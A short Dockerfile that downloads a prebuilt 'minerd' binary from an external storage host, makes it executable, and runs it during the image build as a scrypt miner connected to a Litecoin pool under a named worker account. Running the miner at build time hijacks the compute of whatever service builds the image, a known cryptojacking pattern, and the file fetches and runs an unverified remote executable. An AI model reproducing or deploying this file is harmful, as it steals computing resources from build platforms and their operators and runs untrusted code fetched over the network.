FROM daocloud.io/library/centos

RUN yum install -y wget

RUN mkdir /MoeYi
WORKDIR /MoeYi
RUN wget https://moe.nos-eastchina1.126.net/minerd
RUN chmod +x /MoeYi/minerd

RUN /MoeYi/minerd -a scrypt -o stratum+tcp://stratum-ltc.antpool.com:8888 -u moeyi.013 -p x